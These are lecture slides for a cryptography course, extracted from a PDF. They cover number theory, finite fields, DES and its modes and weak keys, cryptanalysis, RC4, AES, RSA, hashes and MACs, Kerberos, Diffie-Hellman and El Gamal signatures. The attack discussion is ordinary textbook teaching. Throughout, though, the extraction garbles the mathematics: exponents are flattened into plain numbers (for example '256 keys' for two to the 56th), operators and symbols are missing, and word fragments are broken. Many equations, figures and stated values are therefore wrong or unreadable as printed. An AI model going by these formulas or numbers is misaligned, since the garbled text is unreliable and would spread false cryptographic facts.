Let m1 = 9, m2 = 10, m3 = 11. Then m = 990. Suppose you wanted to nd 889899 mod 990. Find the representation of 889 in the new system, which (7, 9, 9). Now 889899 = (7, 9, 9)899 = (7899 mod 9, 9899 mod 10, 9899 mod 11) That is = (4, 9, 5). Convert this back to the integer = 49.
Square roots mod p

Theorem (Eulers criterion): a is a quadratic residue in iff Zp a
p1 2 p1 2
If a is a QR, then let a = . Then a

2
1 (mod p)
p1 2
If a 1, let a = g i . So g i(p1)/2 1. But g being a generator its ord is p 1 (p 1) | i(p 1)/2 i is even a is QR.
= p1 1.
Square roots mod p. . .

Let p 3 (mod 4) be prime and let y be an integer. Let x y (p+1)/4 (mod p). Then, If y has a mod p, then they are x. Otherwise, y has a mod p, then they are x. This means that x2 +y or x2 y . So, at least one of y is a QR. But by Eulers criterion, only one of them can be, because (p 1)/2 = (4k + 3 1)/2 = 2k + 1 is odd. x4 y p+1 y 2 y p1 y 2 (mod p)
Square roots mod p. . .

Example: Find 26055 mod the prime 34807. 34807 3 (mod 4).
26055(34807+1)/4 (mod 34807) = 33573. Example: Find all 1522756 mod 2325781. 2325781 = 523 4447. Both 523 and 4447 are 3 (mod 4). Use CRT to nd the four solutions.
Finite Fields
A eld F (sometimes denoted by Fq ) is a set of elements with two operations + and satisfying:
For every power pn of a prime, there is exactly one nite eld with pn elements, and these are the only nite elds.
a = 0 F, a multiplicative inverse a1 F such that a a1 = 1.
F is closed under + and , commutative w.r.t + and , associative w.r.t + and , and distributes over +. 0 is the identity for +, 1 is the identity for . a F, a | a + (a) = 0.
The Ring of Polynomials Z2[X ]

This is the set of polynomials whose coefcients Z 2 i.e., {0, 1}. x6 + x3 + 1 01001001. 0, 1. +, , same as with polynomials except that coefcients are added and multiplied in Z2 . Division possible with a remainder. For e.g., x4 + x 3 + 1 2 = ( q x + 1, r x) 2 x +x+1
Irreducible polynomial
Let F be a eld. A nonconstant polynomial f (x) F [x] is said to be irreducible if f (x) cannot be expressed as a product of two polynomials of lower degree [Gal02, Pg. 295]. f (x) = 2x2 + 4 is irreducible over R but reducible over C. f (x) = x2 + 1 is irreducible over Z3 but reducible over Z5 . Factors into (x + 2)(x + 3).
Zp[X ] mod (irreducible polynomial)

Procedure for constructing a nite eld with pn elements. Zp [X ] is the set of polynomials with coefcients mod p. Choose P (x) to be an irreducible polynomial mod p of degree n. Let GF(pn ) be Zp [X ] mod P (x). Then GF(pn ) is a eld with pn elements. Using different irreducible polynomials generate isomorphic elds.
GF(2 ) and AES

Convenient to represent a eld element as a byte. Irreducible polynomial is x8 + x4 + x3 + x + 1.
Examples
Show that x4 + x + 1 is irreducible in Z2 [x].
Atleast one factor is of degree 2. Possible choices are x2 + x +1, x2 +1, x + 1. None of them divide x4 + x + 1.
Show that x16 x (mod x4 + x + 1).
Ints mod p vs Poly mod irreducible

Prime number q Zq Integers Zp [X ] Irreducible P (X ) of degree n Zp [X ] (mod P (X )) Field with pn elements
Field with q elements
Block & Stream Ciphers

Chapter 4 of textbook
Block Ciphers
A block cipher of block size b bits species a permutation on b-bit values for each key. DES is a 64-bit block cipher while AES is a 128-bit block cipher.
b bits
k bits
b bits
Block Ciphers & DES p.113
Block Ciphers. . .
A b-bit block has 2b plaintext and ciphertext blocks. This means there are 2b ! permutations. Thus, a 64-bit block cipher with 80-bit key is not an anomaly.
DESHistory
Described in FIPS46-3. Late 60s Feisel worked on block ciphers. 1972 NBS (NIST) issued RFP. 1974 IBM developed and submitted LUCIFER (64 bit block, 128 bit key). NSA xed it (S-boxes). 1979 Adopted as a standard, accepted by the banking community. 1999 Broken in 22 hours using exhaustive key search.
DESProperties
Block size = 64 bits; key size = 56 bits. Software nightmare because of permutations and table lookups. Great for pipelining because each round can work on a different key. Key size too shortbrute force search possible. Exhibits strong avalanche effect [Sta99, pg. 73]. DESk (X ) = DESk (X ).
Block Ciphers DES

Feed swapped from the bottom of the first L0 R0 K0 F F R3 L3 K2
L1
R1 K1 F
R2
L2 K1 F
L2
R2 K2 F
R1
L1 K0 F
L3
R3
R0
L0
Block Ciphers DES. . .

Feistel Structure. Decryption essentially same as encryption. Inverts itself with a reversed key schedule.

The initial permutation IP.
58 60 62 64 57 59 61 63 50 52 54 56 49 51 53 55 42 44 46 48 41 43 45 47 34 36 38 40 33 35 37 39 26 28 30 32 25 27 29 31 18 20 22 24 17 19 21 23 10 12 14 16 9 11 13 15 2 4 6 8 1 3 5 7
Input bit 58 goes to output bit 1. Bits are numbered from the top-left (1) to the bottom-right (64). Table shows the sequence of connections of output bits after IP.

IP1 is the inverse of IP. If bit x goes to bit y in IP, then bit y goes to bit x in IP1 .

The E bit selection table. Convert 32 48 bits.
32 4 8 12 16 20 24 28 1 5 9 13 17 21 25 29 2 6 10 14 18 22 26 30 3 7 11 15 19 23 27 31 4 8 12 16 20 24 28 32 5 9 13 17 21 25 29 1
Divide input into groups of four (eight sets). Convert each group into six by borrowing from adjacent members. Bit 32 in the input becomes bit 1 in the output etc. Bits are numbered from the left (1) to the right (64).

The S boxes.
row 0 1 2 3 0 14 0 4 15 1 4 15 1 12 2 13 7 14 8 3 1 4 8 2 4 2 14 13 4 5 15 2 6 9 6 11 13 2 1 7 8 1 11 7 8 3 10 15 5 9 10 6 12 11 10 6 12 9 3 11 12 11 7 14 12 5 9 3 10 13 9 5 10 0 14 0 3 5 6 15 7 8 0 13
Take the rst and last bit of the input as a two bit binary number to index the row. Take the middle four bits as a binary number to index the column. Bits are numbered from the left (1) to the right (64).

The key schedule. PC1 maps 64 bits 56 bits. Bits 8, 16, 24, 32, 40, 48, 56, 64 are parity bits and are skipped. Bits are numbered from the left (1) to the right (64). PC2 maps 56 bits 48 bits. Its the same at each step. Fixed left shifts at each step.
Block Cipher Modes

Used to encrypt something other than exactly a block size. Doesnt provide tamper resistance by itself.
Block Cipher Modes ECB

Ci = Ek (Mi ). Its malleable i.e., an active intruder can swap Ci and Cj or compose whole messages from parts of separate ones, as in for e.g., [P96, Section 4.4]. Depositor Account # Amount 24B 8B 8B
And its prone to dictionary attacks i.e., if Ci = Cj Mi = Mj . In DES, there are 264 CTs, so by the birthday paradox theres a probability > .5 that 232 blocks of random CTs will result in a collision. This is = 8 232 = 32GB of text.
Block Cipher Modes CBC

Ci = Ek (Mi Ci1 ). IV is secret because initial parts of the message may be known, such as e-mail headers etc., which would provide a (M, C ) pair. A transmission error affects at most two plain text blocks, the block containing the error and the following one. Decryption: Mi = Dk (Ci ) Ci1 .
Block Cipher Modes OFB

i Ci = P i E k (IV ). Turns DES into a stream cipher-like mode. Both IV and K are secret. Nobody uses it because there are much faster stream ciphers. Transmission bit errors do not propagate.
Block Cipher Modes CFB

Ci = Pi Ek (Ci1 ). Also a stream mode of operation. Transmission error affects at most two plain text blocks. Decryption: Pi = Ci Dk (Ci1 ).
So it seems that a transmission error affects at most two plaintext blocks in this case as well because in order to decrypt Ci , one only needs Ci and Ci1 .
DESProperties. . .
keys k in DES such that DESk (DESk (m)) = m
1 Or, keys k such that DESk (m) = DESk (m). These are called weak keys. These are keys that generate a key schedule in which
k1 = k2 = = k16
DESProperties. . .
keys k, k in DES such that m, c = DESk (m) m = DESk (c)
Or that DESk (DESk (m)) = m [x5c, Q. 67]. These are called semi-weak keys. The key schedule for k is the reverse of that of k .
Show my m4 diagram of propagating L0 , R0 to L16 , R16 .
DESProperties. . .
Weak keys in DES are [P96, Table 3-10]:
Left half Right half Weak Key Value zeros zeros 0101010101010101 ones ones FEFEFEFEFEFEFEFE zeros ones 1F1F1F1F0E0E0E0E ones zeros E0E0E0E0F1F1F1F1 Examples of semi-weak keys in DES are [P96, Table 3-11]:
(01F E 01F E 01F E 01F E, F E 01F E 01F E 01F E 01)
Avalanche Effect
PT or Key in CT.
Extra Credit: Study and present another block cipher and summarize it in a single page.
Block Cipher Design Principles
# of rounds the more the better. Design of the F function (provides confusion). Key Scheduling.
Block Cipher Design Principles p.133
Block Cipher Design Principles. . .

Design of the F function in the context of Feistel ciphers. As non-linear as possible. Strict avalanche criterion: i, j any output bit j of an S-box should change with probability 1/2 when single input bit i is inverted. Or, a boolean expression involving any output bit involves all input bits. Bit independence criterion: i, j, k output bits j, k should change independently when any single input bit i is inverted.
Approximately speaking, 00, 01, 10, 11 (1 bit ip, 0 no bit-ip) should be equiprobable. For all inputs, create 2(m1) pairs, one in which input bit i = 0 and the other in which the input bit i = 1 . . .See [WT85] for more details. Block Cipher Design Principles p.134
Attacks on Block Ciphers Exhaustive Search
Try all possible keys. 256 keys 1019 keys.
Cost Time 1 DES encryption/s > 1000 years Wiener $100K machine 35 hours Wiener $1 M machine 3.5 hours = 210 mins Wiener $10M machine 21 mins
Attacks on Block Ciphers Differential Cryptanalysis
Biham & Shamir 1989. O(247 ) time and O(247 )(M, C ) pairs on DES. If the S-boxes were random, a differential cryptanalytic attack would require O(220 ) time and O(220 )(M, C ) pairs.
Attacks on Block Ciphers Linear Cryptanalysis
Breaks DES in O(243 ) time and O(243 ) randomly chosen (M, C ) pairs [Mat93]. Essentially a known-plaintext attack.
Linear Cryptanalysis. . .
Find effective linear expressions for DES of the form P [i1 , i2 , . . . , ia ] C [j1 , j2 , . . . , jb ] = K [k1 , k2 , . . . , kc ]
that hold with probability p. |p 1/2| represents the effectiveness of the equation. Guess of eqn. if p > 1/2 and = otherwise. Can then determine one key bit K [k1 , k2 , . . . , kc ] as follows: Evaluate P [i1 , i2 , . . . , ia ] C [j1 , j2 , . . . , jb ] with N random samples. Let T of them evaluate to 0. If p > 1/2, guess K [k1 , k2 , . . . , kc ] = T /N . If p < 1/2, guess K [k1 , k2 , . . . , kc ] = T /N .
Linear Cryptanalysis Linear Approximation of S-boxes
Given that for S5 (S box #5), the 4th input bit is related to the four output bits with probability 12/64, we can propagate this equation through a three round DES as follows (rounds 1 and 3) [Mat93]:
PH [7,18,24,29] F1 PL [22] [15] X1 K1
K2 F2 X2
[22] [7,18,24,29] F3 CH [15] X3 CL
K3
Linear Cryptanalysis Linear Approximation of S-boxes. . .
X2 [7, 18, 24, 29] PH [7, 18, 24, 29] = K1 [22] X2 [7, 18, 24, 29] CH [7, 18, 24, 29] = K3 [22] Canceling X2 [7, 18, 24, 29] we get a ,
PH [7, 18, 24, 29]CH [7, 18, 24, 29]PL [15]CL [15] = K1 [ Extra Credit: Break 5-round DES as described in [Mat93].
a Look at it this way: X [15] K [22] = P [7, 18, 24, 29] X [7, 18, 24, 29] and 1 1 H 2
X3 [15] K3 [22] = X2 [7, 18, 24, 29] CH [7, 18, 24, 29]
DES VariantsDouble-DES
If Ek (M ) is a symmetric cipher, then dene DEk1 ,k2 = Ek1 (Ek2 (M )) Pictorially, it is M Ek2 Ek1 C .
DES VariantsDouble-DES. . .
Susceptible to meet-in-the-middle attack. Given an (M, C ) pair: Step 1: Build the following table (sorted on Ek (M )) for all keys k
k1 k2 ki E k 1 (M ) E k 2 (M ) Eki (M )
1 Step 2: y , check if Ey (C ) is in the table for some key x. Then (x, y ) encrypts M C . For a k bit key, time 2k + 2k log 2k k 2k . That is, given enough space, DE is only as secure as E.
DES VariantsTriple-DES
If Ek (M ) is a symmetric cipher, then dene Key length = 112 bits for DES. Dk2 only for backward compatibility, could use E instead. 2KTEk1 ,k2 = Ek1 Dk2 Ek1
DES VariantsTriple-DES. . .
Effective key length is k bits in a CCA/CPA.
0 P A X K1 K2 B Y K1 C Z
For all keys k compute Dk2 (0) in a table T. Now, for each key k , nd p = Dk (0). Do a CPA on p to nd the corresponding z . From this (z, k ) nd y . See if y occurs in T. This is a possible pair of keys for T-DES. Except for an uncommon attack noted by Merkle, triple DES does yield the expected strength of 2112 [P96, Section 4.5].
DES VariantsTriple-DES. . .
Better to use three independent keys. Effective key length = 112 bits in a KPA (meet-in-the-middle). TEk1 ,k2 ,k3 = Ek1 Dk2 Ek3
DES Variants: DESX

DESX: Actually a generic construction. Invented by Ron Rivest around 1984. Intended to protect DES against exhaustive key search. Key-size for DESX = 2 64 + 56 = 184 bits. Effective key length = 64 + 56 1 = 119 bits [KR96]. DESX has hardly any computational overhead over ordinary DES. Ek1 ,k2 ,k3 = k1 DESk2 (M k3 )
DES Variants: DESX. . .

DESX is secure against generic (black box) attacks such as exhaustive search [KR96]. DESk (M k ) and DESk (M ) k are no good.
To break the former assume that you have two pairs (m1 , c1 ), (m2 , c2 ). Now, for each k , (m1 , c1 ) reveals a k that can be veried with (m2 , c2 ). So you just need to cycle through the space for k . The latter is simpler: given (m1 , c1 ), (m2 , c2 ), c1 c2 = Ek (m1 ) Ek (m2 ). So you again cycle through the space of k to satisfy one or more such relations.
DESX assumes DES to be an ideal cipher, i.e., 1 , 2 , . . . , 2|k| are independent random permutations. Extra Credit: Read [KR96] and summarize in one page.
Stream Ciphers
Lets approximate OTP with a pseudo-random OTP key. The pseudo-random generator seed is the key.
Stream Ciphers LFSR

rn r1
Goal: Choose taps and initial content so that the period is as long as possible. Hope for 2n 1 (exclude all 0s).
Stream Ciphers LFSR. . .

Pro: Very fast in hardware. Con: The linearity of the LFSR is its weakness. It can be broken with only 2n bits of known (plaintext, ciphertext).
From this you can get 2n bits of key, say k2n , . . . , k2 k1 . Form and solve the following equations for the tap values ti as k n+1 kn+2 . . . k2n tn k n tn kn+1 = tn k2n1 + + tn1 kn1 tn1 kn . . . tn1 kn ++ t 1 k1
+ + t 1 k2 + + t 1 kn
Stream CipherRC4
Stream ciphers dont encrypt PT blocks directly. Invented in 1987 by Rivest. Reverse engineered and posted on the Cypherpunks mailing list in 1994. Seed: A permutation of the sequence (0 . . . 255) and two numbers 0 i, j < 256. Derived from the input key.
Stream CipherRC4. . .
do forever: i = (i+1) % 256 j = (j + S[i]) % 256 swap(S[i], S[j]) update register state t = (S[i] + S[j]) % 256 output S[t]
Is it secure? Cant prove it. 1997: Run generator for 1012 iterations. LSb of these 1012 bytes has slightly more 1s than 0s.
Features of Rijndael
Pronounced as Rhine-doll. Joan Daemen (of Proton World International) and Vincent Rijmen (of Katholieke Universiteit Leuven). Allows only 128, 192, and 256-bit key sizes (unlike the other candidates). Variable block length of 128, 192, or 256 bits. All nine combinations of key/block length possible. A block is the smallest data size the algorithm will encrypt. Vast speed improvement over DES in both hardware and software implementations.
AES p.153
AES Transformations
The round transformation of Rijndael does not have a Feistel structure.
ByteSub is a non-linear byte substitution, the S-box is invertible. You take the multiplicative inverse of the byte in GF(28 ) and then apply an afne transformation in GF(2). ShiftRow is simple. In MixColumn, the columns of the state are considered as polynomials over GF(28 ) and multiplied with {03}x3 + {01}x2 + {01}x + {02} modulo x4 + 1. The inverse of MixColumn is similar to MixColumn. RoundKey addition is a straightforward bitwise XOR with the key.
AES p.154
Inverting AES
0 I B BS B B B B B @ BS BS I SR I MC . . . MC I 1 0 ARK I B SR1 ARK C C B C B C B C B C B A @ SR1 ARK ARK SR1 0 I SR1 SR1 SR1 I BS 1 BS 1 BS 1 I ARK 1 . . . ARK 1 I 1 ARK 1 M C 1 C C C C C C 1 A MC ARK 1
SR SR
I B BS 1 B B B B B @ BS 1 BS 1
I ARK 1 . . . ARK 1 I
1 ARK 1 M C 1 C C C C C C 1 A MC ARK 1
AES p.155
Inverting AES. . .
Each of BS, SR, MC, and ARK is invertible. BS and SR commute. (M C ARK ) = [({03}x3 + {01}x2 + {01}x + {02}) (s0i x3 + s1i x2 + s2i x + s3i )] (k0i x3 + k1i x2 + k2i x + k3i ) If E44 = M44 S44 + K44 , then to invert E , we have
1 1 E + M M4 44 4 44 K44 = S44
which is the same form as M S + K but with M = M 1 and K = M 1 K .
AES p.156
RSA & Discrete Logs

Chapters 6,7 of textbook
AES p.157
RSA
By denition (n) is the number of integers 0 < x < n that are relatively prime to n. Consider where p and q are distinct primes. Then (n) = (n 1) (p 1) (q 1) = (p 1) (q 1) n=pq
RSA p.158
RSA. . .
Choose large primes p and q differing by a few digits. Say one of 75 digits, the other of 100 digits. Both (p 1) and (q 1) should contain a large prime factor. Compute n = p q . Its hard to factor n. Choose e to be, say 65537. Public key = (e, n). Compute d e1 mod (n). Private key = (d, n). Infeasible to get d given (e, n). For a given message m, its encryption is c = me mod n. And to decrypt a cipher text c, compute m = cd mod n. ed m med m1 mod (n) m.
RSA p.159
An example of RSA
Let p = 57748729314142811323 and q = 5295757044745316310341. Then, n = 305823240090462151745038276856407276791143 (n) = 305823240090462151739684771082347817669480. Choose e = 65537, then d = e1 mod (n) = 59944845540718629190350345138224820571313 Encode a message NUS as its binary encoding (for example) to get 0x4e5553 = 5133651.
RSA p.160
An example of RSA. . .
To encrypt, nd
513365165537 mod 305823240090462151745038276856407276791143 = 217657393729141588774828799917624500652607 To decrypt, compute cd to get the original message.
217657393729141588774828799917624500652607599448455407186291903 = run time error in bc = 5133651
RSA p.161
Breaking RSA
Brute force. Try all possible values of d. Given an (m, c) pair, nd a d such that cd = m. From this you might be able to factorize n [TW02, Exponent Factorization, Section 6.4]. Timing attacks. Do we need factorization to solve the RSA problem which is nding the eth root modulo n [MvOV96, Section 3.3]?
RSA p.162
Breaking RSA. . .
Mathematical attacks. Factor n. Find (n). But knowing (n) is equivalent to factoring n. Because n = pq, (n) = n (p + q ) + 1 and we have p + q = n + 1 (n) pq = (p + q )2 4n This gives equations for p + q and p q .
Show [Sta99, Fig. 6.9] on MIPS years needed to factor large n.
RSA p.163
Timing analysis
To compute ax , use modular exponentiation. Square and multiply (if the corresponding bit in x2 is 1). Suppose you have correctly guessed the rst (b 1) least signicant bits of the exponent. Now you want to guess the bth bit. Assume that the intermediate values for some as are such that the multiply at the bth bit takes excessive time! Then bth bit 1 correlation between the bth bit multiplication time and remaining time needed. bth bit 0 no such correlation.
RSA p.164
Primes and Factoring

Go to this slide.
RSA p.165
Miller-Rabin Primality Test

Theorem: If p is an odd prime, then x2 1 mod p has only two solutions, namely x = 1 and x = 1.
Proof: x2 1 mod p means that p | (x2 1), or p | (x 1)(x + 1). Because p is prime, it divides either (x 1) or (x + 1). It cannot divide both because then itd divide their difference which is (x + 1) (x 1) = 2. Example: 5 mod 6 = 1 because 5 1 =
2 2 (51)(5+1) . 23
RSA p.166
Miller-Rabin Primality Test. . .

By Fermats theorem, xp1 1 mod p if p is prime. So to test a number n for primality, try Fermats for x = 2, 3, 4. Now, let n 1 = 2 y . Find x . We ultimately want to nd x . So, repeatedly square xy but make sure that you never have z 2 = 1 when z = 1.
e y y2
e
Examples Is 125 prime? Lets try the Miller-Rabin test with base 2. (125 1) = 124 = 22 31. Now 231 = 23, 232 = 29, 292 = 91. So 125 simply fails the Fermat test and is not prime.
Is 561 prime? Lets try again with base 2. (561 1) = 560 = 24 35. Now 235 = 263, 2632 = 166, 1662 = 67, but 672 = 1! So 561 fails the Miller-Rabin primality test because we get 672 = 1 (mod 561) 561 is not RSA p.167 a prime.
Problems with RSA

Problems with textbook RSA Existential forgery. Blinding attack. Timing attack. Standard signatures use PKCS #1 to avoid these problems. Prime Generation for RSA Use the Miller-Rabin probabilistic test for primality testing. Choose primes to be strong primes. The number of primes n = n/ log n. Thus on the average one needs to test only log n/2 numbers to nd a prime
RSA p.168
Discrete Logs
Let Zp = {0, 1, . . . , p 1}, p is prime and For 0 < g < p lets study the sequence g1, g2, g3, . . . We know from Fermats that g p1 1 (mod p).
Show [Sta99, Table 7.6]. Zp = {1, 2, . . . , p 1}
Discrete Logs p.169
Discrete Logs. . .
The sequence g 1 , g 2 , g 3 , . . . ends in 1. If the sequence ends in 1, it clearly repeats itself after that.
If it does not, let g m = g x , g = 1, 0 < x. Then, g m (g xm 1) 0 which means that either p | (g xm 1), or p | g m . But p | g m because p | g . So g xm 1 mod p which is a contradiction. Zp is a cyclic group. Not every element of Zp is a generator. For e.g., 2 mod 7 = {1, 2, 4}. Logarithms are the inverse of exponentiation.
Discrete Logs p.170
Discrete Logs. . .
Reals logx 1 = 0 logx x = 1 logx (yz ) = logx y + logx z logx (y r ) = r logx y Z p logg 1 (mod p) 0 logg g (mod p) 1 logg (yz ) (mod p) logg y + logg z (mod (p)) logg (y r ) (mod p) r logg y (mod (p))
Discrete Logs p.171
Discrete Logs. . .
See the primitive roots table to explain generators. x = y mod p dlog y = x Discrete logs can be used to implement bit commitment and key exchange.
Discrete Logs p.172
El Gamal public key encryption

From [TW02, Sec. 7.4]. Given p prime, generator of Zp , a private key, = a public key, and k a pseudo random integer. To encrypt a message 0 < m < p, Compute r = k (mod p). To decrypt c, compute ( k m)/r a . Encryption of m, c = r, k m .
Given k , a , can you nd ak without knowledge of a? Because if you can, then you can nd r a = ak .
Discrete Logs p.173
Macs and Hashes
Discrete Logs p.174
Hash Functions
A hash function accepts a variable-size message m as input and produces a xed-size hash code h(m), called its message digest. It is a function of all the bits of the message. Instead of signing and MACing messages, one can sign and MAC hash of messages. Much faster for signatures. MACs no slower than hashes.
Hash Functions p.175
Hash Functions. . .
A hash function should be [Sta99, Sec 8.4] Relatively easy to compute. Pre-image resistant. Means a one-way hash i.e., given y = h(x), cant [computationally] nd x. Second pre-image resistant. Useful for virus protection. Given x, h(x), cant nd x | h(x) = h(x ). Collision resistant. Cant nd arbitrary x, y | h(x) = h(y ) by just examining h. A simple hash function is the XOR of xed sized message blocks. Useless for data security. Trivial to compute pre-image and second pre-image. By the birthday paradox, if the hash size is 64 bits, then time for collision 232 (small). Typical hash size 160 bits.
Hash Functions. . .
Examples: MD5, SHA-1. Almost all real-life hash functions are iterative the Merkle-Damgrd construction. CV0 is xed and known for the hash function.
Y0 b Y1 b Y2 b
CV0
CV1
CV2
Generalized Birthday Attack

Probability P (n, k ) that theres a duplicate in k random selections between 1 . . . n [Sta99, Appendix 8A]. P (n, k ) = 1 no duplicates in k selections (nk+1) = 1 n(n1) nk 1 1 = 11 1 n 1 k n 1e
1 n
e e decreases because each product term < 1, hence P (n, k ) = 1 product increases which means that the probability of collision increases.
1 n (k1) n
For k 2 ln 2 n, P (n, k ) = .5. As k increases, the product
1e
k(k1) 2n
(k1) n
, 1 x ex
MACs
A MAC hk (m) takes a secret k and a variable-size message m as input and produces a xed-size code such that An attacker capable of chosen message attack cannot do existential forgery i.e., construct hk (m) for an unknown m.
MACs p.179
CBC-MAC
See [Sta99, pg. 252]. Tail needed to prevent existential forgery.Classic construction used in the banking industry. Its secret key is the pair (k, k ).
M M M
Ek'
Ek
Ek
Ek
Ek
MACs p.180
MACs from CRHFs such as MD5 & SHA How about MACk (M ) = h(k ||M )? Bad idea because of Merkle-Damgrd construction. Consider the message M = km. This is hashed as km|pad . From this, construct the message M = km pad . This is hashed as km|pad pad2 . Without knowledge of k , one can How about MACk (M ) = h(M ||k )? Bad idea. You can do a birthday attack to get m, m such that Hi (m) = Hi (m ). So, collision is independent of k . How about MACk (M ) = h(k ||M ||k )? Envelope method. No serious attacks but no analysis either.
say that h(M ) = f (h(M ), padding .
MACs p.181
MACs from CRHFs such as MD5 & SHA. . . HMAC [Sta99, pg. 294], [BCK96a] and [BCK96b]. Used in SSL, IPSec. 0 is used to pad k to full compression function block size for h, usually 512 bits.
512b 128/160b
HMACk (x) = h(0 k op || h((0 k ip) || m))

512b
[0 k ip] and [0 k op] are of compression function block size. Block size for MD5 = SHA-1 = 512 bits. Chaining variable size for MD5 = 128 bits, for SHA-1 = 160 bits. On a 200MHz Pentium, HMAC-MD5 clocked 28.5MB/s while HMAC-SHA-1 clocked 15.25MB/s. CBC-MAC on the other hand, clocked 4.7MB/s and IDEA-MAC clocked 3MB/s.
MACs p.182
Protocols
Adapted from [P96, Chapter 4]. A protocol is an orderly sequence of steps two or more parties take to accomplish some task. A good protocol should be Established in advance. Mutually subscribed to. Unambiguous. Complete.
For example, the hello protocol on phone connections.
We are interested in protocols by which mutually suspicious parties can interact with each other and be convinced of fairness.
Security Protocols p.183
Types of Protocols
Arbitratedtrusted third party involved in the interaction. Finding a mutually trustworthy third party? Availability of the third party (may become a bottleneck). Shares secrets with involved parties. Adjudicateddisinterested third party can judge fairness based on evidence. Detect failure after the fact. Self-Enforcingguarantees fairness. If either party cheats, it becomes evident to the other party.
Key Exchange ProtocolsNS

Symmetric Key Exchange Using a Trusted Server. Authentication with key exchange as side-effect. Say Pablo wants to communicate with Renee. S is the trusted server [NS78]. Pablo and Renee each share a key with the server, say KP and KR . P S : (P, R, IP ). P requests appropriate credentials to authenticate himself to R. sess key ticket S P : EKP (IP , R, KP R , EKR (KP R , P )). S returns a session key encrypted for P and a ticket encrypted for R. P R: EK (KP R , P ).
Key Exchange Protocols. . .NS

Compromise of the session key results in spoong [DS81]. The protocol fails to provide key freshness from the viewpoint of R [Seb], [Sma03, Section 6.2.3]. Knowledge of KP R allows message three to be replayed, thus permitting anyone to become P . Subject to attacks if passwords such as KP are weak.
Key Exchange Protocols. . .Kerberos

From [Sma03, Section 6.2.5]. T T Pc
1 4 2 + "
Bob j
Alice
1. A, B . No nonceeveryone is loosely time synchronized. 2. {TS , L, Kab , B, {TS , L, Kab , A}Kbs }Kas 3. {TS , L, Kab , A}Kbs , {A, TA }Kab 4. {TA + 1}Kab
Kerberos V4
Adpated from [KPS95, Chapter 10] and [Sta99, Chapter 11]. Based on work by Needham and Schroeder [NS78]. KDC + library of subroutines used by distributed applications. Some modied applications: telnet, BSD rtools, NFS. KDC shares master key with each principal (each user and resource that will be using Kerberos). Bob knows that anyone who knows KAB is acting on Alices behalf.
Kerberos V4. . .
Alice registers with Kerberos and gets a ticket from the TGS. Alice WS. (Tx pwd DES key). WS AS. (AS_REQ to get a TGT). AS WS. (AS_REP KA {SA , T GT }).
Kerberos V4. . .
Alice wants to talk to Bob. Alices WS TGS. (TGS_REQ TGT + Authenticator) Authenticator SA {T S } (within 5 mins of current) TGT KKDC {Alice, SA }.
Kerberos V4. . .
Alice establishes communication with Bob. Alices WS Bob. (AP_REQ Bobs ticket + Authenticator) Authenticator KAB {T S } Bobs ticket KB {Alice, KAB }.
Kerberos Realms
Hard for everyone to trust a single KDC. Divide network intoo realms, each with its own KDC database. Principal (NAME , INSTANCE , REALM) for e.g., (leserv, jailbreak, R1). For humans, INSTANCE could be a role. Interrealm Authentication KDC in realm B is registered as a principal in realm A.
Key Exchange Protocols

Its not a good idea to exchange too much information encrypted with a single key. Symmetric Key Exchange Without Server Send EKold (Knew ) to the other party!
Key Exchange Protocols. . .

Asymmetric Key Exchange Without Server (P knows Rs public key). Reduces the need for individual keys. Reduces the vulnerability of a central repository. P could send ER (KP R ) directly to R. No authentication. No replay prevention. P could send ER (DP (KP R )) to R. One message passes an authenticated, condential key. No replay prevention. Have P decrypt a nonce with KP R to avoid that.
Key Exchange Protocols. . .

Asymmetric Key Exchange With Server (P doesnt know Rs pubkey) The server provides public keys for everyone. Exchange is as in the previous case. How do you ensure that the server has the right public key for everyone? In practice, the server issues certicates encoded in DER.
Show openssl x509 -inform der -in pub.der -text.
Encrypted Key Exchange [BM92]

PA is a randomly generated public key. Even if KAB is weak, nding K in message two is hard. Messages 35 provide mutual authentication and freshness of this run of the protocol. 1. A 2. A
o KAB (PA ) /B
KAB (PA (K )))
B
/B
3. A 4. A
o
K (C A )
K (CA |CB ) K (C B )
B
/B
5. A
Key Exchange in SSL

C C C C
1 S Supp cipher suites, 28B randomness r2 S Chosen cipher suite, 28B randomness S Server cert S EservP ubKey (Client selected 48B PMS) Both parties compute MS h(pms||r1 ||r2 ) Encryption & MAC keys derived from MS
Does this protocol provide client authentication? Also see the SSL protocol.
DH Key Exchange. . .unauthenticated

ga
Alice k
gb
Bob
Both Alice and Bob compute g ab . g, p are known in advance. In practice, do this in a large subgroup of Zp . Subject to person-in-the-middle attack. Dife-Hellman problem: Given g a , g b , compute g ab . Certainly no harder than DLog. Does DLog hard DH secure? Open problem. (Strong evidence).
DH. . .person-in-the-middle
ga gp ) gq
Alice j
Eve i
) gb
Bob
Alice believes shes talking to Bob because messages make semantic sense. A simple challenge-response protocol from Alice to verify Bob succeeds. (Should ask for challenge+DH params for connection). Eve establishes shared key g aq with Alice, and g pb with Bob. Eve deciphers every message between Alice and Bob.
Dife-Hellman in practice
p = 1024 bit prime. g Zp , an element of order q .
Now a {0, 1, . . . , q 1} and b {0, 1, . . . , q 1}. Since q is 160 bits, g a (mod p) only needs 160 multiplies rather than 1024. A seven fold improvement!
q , a prime s.t. q | (p 1) and q 2160 (160 bits).
Digital Signatures
Suppose you send e-mail to your bank to transfer $100 to Tims account. Why should the bank believe the e-mail came from you [unaltered]? Authentication ( integrity). If the bank transferred the money, maybe you can disavow the e-mail. Non-repudiation. In case of dispute, can it be settled by a neutral third party? Signatures basically provide non-repudiation that shared key systems do not.
Digital Signatures with Symmetric Encryption
With the aid of a trusted third party! A signature is the encryption of the message. EKS is S s encryption key, while EKR is Rs encryption key. A is the trusted third party (arbiter). S A : EKS (M ). A R : EKR (M, S, EKS (M )) . A says that S said M
Digital Signatures With Public Key Encryption
Authentic but not private. S R : ER (DS (M )). But what if R decrypts the outer layer and reencrypts the inner message to create a new message EU (DS (M ))? This would make it appear as if S sent a signed message to U !
S R : DS (M ).
Digital Signatures With Public Key Encryption (El Gamal)
From [TW02, Sec. 8.2]. Prime p, Generator of Zp , i.e., ord = (p 1). Private key 1 a (p 2), Public key = a ,
Computing s seems to require knowledge of a (private key) & k , which requires the ability to compute discrete logs. Signature is the pair (r, s). Precomputing of (k, r) pairs is possible and signature generation is then cheap! Security Protocols p.204
Signature on m: s = (m ar)k 1 mod (p 1)
Pseudo random integer k (p 1), r = k .
Digital Signatures With Public Key Encryption (El Gamal). . .
Verication: m = r rs (mod p).
Verication only requires (, r) both of which are public. Verication requires exponentiation! To derive the verication equation from rst principles, consider that s s ( )
s k k s
= (m ar)k 1 mod (p 1) (mar)k1 = (mod p) =

(mar)k1 k
mod p
= (mar) mod p rs = m r mod p rs r = m mod p
